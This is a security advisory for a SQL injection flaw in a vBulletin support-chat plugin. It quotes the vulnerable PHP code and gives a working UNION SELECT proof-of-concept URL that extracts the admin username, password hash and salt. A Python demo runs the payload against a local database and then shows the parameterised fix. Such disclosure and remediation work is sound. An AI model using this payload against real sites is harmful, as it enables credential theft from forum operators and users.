vBulletin MicroSUPPORT Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=254336
Version: <= 4.6.4 (latest)

The vulnerability resides in the microsupport.php file. None of the request variables used in its SQL queries is sanitized before being placed into the query, so every query that takes user input is affected. An easy way to extract information out of the database is by abusing the checkchatcall_request branch of the script, which looks like this (braces and the else branch are restored here; the original listing was truncated):

if ($_REQUEST['requester'] == "checkchatcall_request") {
	// TYPE_STR only trims/unslashes the value; it does not escape it for SQL
	$adminsID = $vbulletin->input->clean_gpc('r', 'adminsID', TYPE_STR);
	// $adminsID is interpolated unquoted, so anything after the number is parsed as SQL
	$chatcheck = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "microsupport_supportusers_online WHERE supportuserid=$adminsID");
	while ($row = $db->fetch_array($chatcheck)) {
		if ($row['usersUID'] > 0) {
			// whatever lands in usersUID is echoed back to the client
			$usersid = $row['usersUID'];
			$output = 'checkchatcall=1&supportuseridrequester=' . $usersid;
		} else {
			$output = 'checkchatcall=0';
		}
	}
	echo $output;
}

Proof of concept (spaces shown unencoded for readability; URL-encode them when sending):
http://example.com/microsupport.php?requester=checkchatcall_request&adminsID=1 UNION SELECT null, concat(1, 0x3a, username, 0x3a, password, 0x3a, salt), null, null, null FROM user where userid = 1

Note that the first field in the concat() call must be a number. The concatenated string lands in the usersUID column of the UNIONed row, and the script only echoes that column when $row['usersUID'] > 0. PHP's loose comparison evaluates a string by its leading digits, so a value starting with a positive number passes the check and the whole username:password:salt string is returned in supportuseridrequester.
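The following is an added, self-contained example that is not part of the advisory or the plugin: it reproduces the handler's query-building and the usersUID > 0 check in Python against an in-memory SQLite database, runs the PoC against it, and shows the fix (cast the id to an unsigned integer, as vBulletin's TYPE_UINT cleaner does, and bind it as a parameter). The five-column layout of the online-support table and the sample rows are constructed assumptions chosen to match the five-value UNION in the PoC; the payload is the advisory's, rewritten from MySQL concat()/0x3a to SQLite's || operator so it runs offline.

```python
import re
import sqlite3

# Constructed demo data (assumption, not the plugin's real schema): only
# supportuserid and usersUID are named in the advisory; the other three
# columns exist so the five-value UNION in the PoC lines up.
SCHEMA = """
CREATE TABLE microsupport_supportusers_online (
    supportuserid INTEGER, usersUID INTEGER, c3 TEXT, c4 TEXT, c5 TEXT);
CREATE TABLE user (userid INTEGER, username TEXT, password TEXT, salt TEXT);
INSERT INTO microsupport_supportusers_online VALUES (2, 7, NULL, NULL, NULL);
INSERT INTO user VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'aB3x');
"""

# The advisory's payload uses MySQL concat()/0x3a; this is the same idea in
# SQLite's || syntax. The leading '1:' is what makes the usersUID check pass.
PAYLOAD = ("1 UNION SELECT null, '1:'||username||':'||password||':'||salt, "
           "null, null, null FROM user WHERE userid=1")


def new_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def php_gt_zero(value) -> bool:
    """Emulate PHP's `$x > 0` for the values seen in this demo.

    PHP 7 converts a leading-numeric string ("1:admin:...") to the number it
    starts with; PHP 8 instead compares a non-numeric string against "0" as
    strings. Both are true for a string starting with a positive digit, which
    is why the PoC puts a number first in concat(). Leading-numeric handling
    here follows PHP 7.
    """
    if value is None:
        return False
    if isinstance(value, (int, float)):
        return value > 0
    m = re.match(r"\s*[+-]?\d+", value)
    if m:
        return int(m.group()) > 0
    return value > "0"


def checkchatcall_vulnerable(db: sqlite3.Connection, admins_id: str) -> str:
    # Same shape as the plugin's handler: the request value is interpolated
    # unquoted, so anything after the number is parsed as SQL.
    query = ("SELECT * FROM microsupport_supportusers_online "
             f"WHERE supportuserid={admins_id}")
    output = "checkchatcall=0"
    for row in db.execute(query):
        users_uid = row[1]
        if php_gt_zero(users_uid):
            output = f"checkchatcall=1&supportuseridrequester={users_uid}"
        else:
            output = "checkchatcall=0"
    return output


def checkchatcall_hardened(db: sqlite3.Connection, admins_id: str) -> str:
    # Fix: force the id to a non-negative integer (what vBulletin's TYPE_UINT
    # cleaner does) and bind it as a parameter instead of string-building.
    try:
        admin_id = max(int(admins_id), 0)
    except ValueError:
        admin_id = 0
    query = "SELECT * FROM microsupport_supportusers_online WHERE supportuserid=?"
    output = "checkchatcall=0"
    for row in db.execute(query, (admin_id,)):
        users_uid = row[1]
        if users_uid is not None and users_uid > 0:
            output = f"checkchatcall=1&supportuseridrequester={users_uid}"
        else:
            output = "checkchatcall=0"
    return output


if __name__ == "__main__":
    db = new_db()
    print(checkchatcall_vulnerable(db, "2"))       # legitimate lookup
    print(checkchatcall_vulnerable(db, PAYLOAD))   # leaks 1:admin:<hash>:<salt>
    print(checkchatcall_hardened(db, PAYLOAD))     # checkchatcall=0
```

Run with any Python 3; the vulnerable path echoes the admin's username, password hash and salt inside supportuseridrequester, while the hardened path turns the payload into id 0 and returns checkchatcall=0 with no SQL ever seeing attacker text.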

